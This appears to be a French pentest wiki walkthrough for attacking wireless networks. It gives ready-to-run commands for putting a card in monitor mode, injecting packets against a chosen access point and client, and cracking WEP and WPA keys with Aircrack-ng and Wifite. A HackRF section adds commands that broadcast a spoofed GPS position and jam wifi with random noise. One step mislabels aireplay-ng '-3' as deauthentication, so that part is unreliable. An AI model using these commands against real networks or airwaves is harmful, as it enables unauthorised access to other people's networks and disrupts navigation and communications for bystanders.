WiFi

[Exploitation/Wifi] Drivers AWUS1900

Introduction

La carte wifi AWUS1900 nécessite l'installation du driver rtl8814au pour fonctionner.

Installation

Kali Linux

sudo apt install dkms build-essential libelf-dev linux-headers-`uname -r` && cd /tmp && git clone https://github.com/aircrack-ng/rtl8814au && cd rtl8814au && sudo make dkms_install

[Exploitation/WiFi] Aircrack-ng

Introduction

La suite d'outils Aircrack-ng permettent d'attaquer des réseaux wifi. L'outil est installé par défaut sur Kali Linux.

image.png

Sources

Prérequis

  1. Une carte réseau wifi avec les chipsets suivants :

Manuel

Les réseaux sans-fil WEP sont très mal sécurisés ce qui permet de les exploiter très facilement et ne prend généralement pas plus de quelques minutes.

Affichez les interfaces réseaux wifi utilisables pour votre attaque :

sudo airmon-ng

Commencez par éteindre l'interface de votre carte réseau wifi :

sudo airmon-ng stop <IFACE>

Passez-la en mode moniteur :

sudo airmon-ng start <IFACE>

Démarrez l'interface :

Scannez les réseaux wifi des environs :

sudo airodump-ng --write <FILE> <IFACE>

Les résultats seront stockés dans le fichier spécifié.

Désormais, mettez de côté le BSSID (adresse MAC du point d'accès) ainsi que le ESSID (nom affiché) du point d'accès que vous souhaitez cibler.

Maintenant ce qui est intéressant c'est de récupérer l'adresse MAC d'un hôte connecté sur ce réseau :

sudo airodump-ng <IFACE> --write <FILE> -channel <CHANNEL> --bssid <BSSID>

Lorsque vous aurez mis de côté une adresse MAC, fermez airodump et préparez deux terminaux.

Lancez la commande suivante dans le premier terminal afin de bombarder la cible avec des paquets de désauthentification :

sudo aireplay-ng -3 -e <ESSID> -b <BSSID> -h <HOST_MAC> <IFACE>

On peut aussi utiliser l'option -x afin de spécifier une vitesse de l'injection de paquet. Par défaut cette vitesse est définie à 600 paquets par seconde mais il est recommandé d'augmenter si vous êtes vraiment proche du point d'accès afin de capturer davantage d'IVs, et au contraire il est recommandé de le diminuer si vous êtes loin pour éviter de faire planter le point d'accès.

Dans le second terminal, lancez la commande suivante en remplaçant les options par les fichiers capturés par aireplay :

WEP

aircrack-ng -x <FILE.cap> <FILE.ivs>

WPA

aircrack-ng -a2 -b <BSSID> -w <WORDLIST> <FILE.cap>

[Exploitation/Wifi] Wifite

Introduction

L'outil Wifite permet d'effectuer des attaques sur les réseaux wifi de manière simple et automatisée.

Par défaut, il est installé sur Kali Linux. 

image.png

Outils complémentaires

Pour pouvoir bénéficier de tout le panel d'attaques que propose Wifite, il vous faudra installer deux paquets supplémentaire :

sudo apt install -y hcxdumptool hcxtools

Manuel

sudo wifite

[Exploitation/Wifi] HackrfOne

Introduction

Ce boitier permet d'effectuer diverses attaques sur les ondes radios.

image.png

Manuel

Firmwares

Téléchargez les firmwares .bin à cette adresse :

Puis balancez le firmware sur l'équipement après l'avoir branché en USB :

hackrf_spiflash -Rw hackrf_one_usb.bin

Fake GPS

Cette technique permet d'envoyer un faux signal GPS aux appareils environnants.

Tout d'abord, installez le paquet hackrf :

sudo apt install hackrf

Puis connectez le boitier et vérifier qu'il soit détecté avec la commande suivante :

hackrf_info

Ensuite, clonez ce dépôt :

git clone https://github.com/osqzss/gps-sdr-sim.git

Compilez pour obtenir le binaire :

make

Puis téléchargez la dernière éphéméride sur le site de la NASA :

 Et lancez l'outil pour générer un fichier gpssim.bin à partir d'une position GPS :

./gps-sdr-sim -b 8 -e brdc3540.21n -l 48.858844,2.294351,100

Puis lancez hackrf pour propager les ondes :

hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 40

Jamming

Pour brouiller un signal wifi :

hackrf_transfer -t /dev/urandom -f 2442000000 -s 20000000 -a 1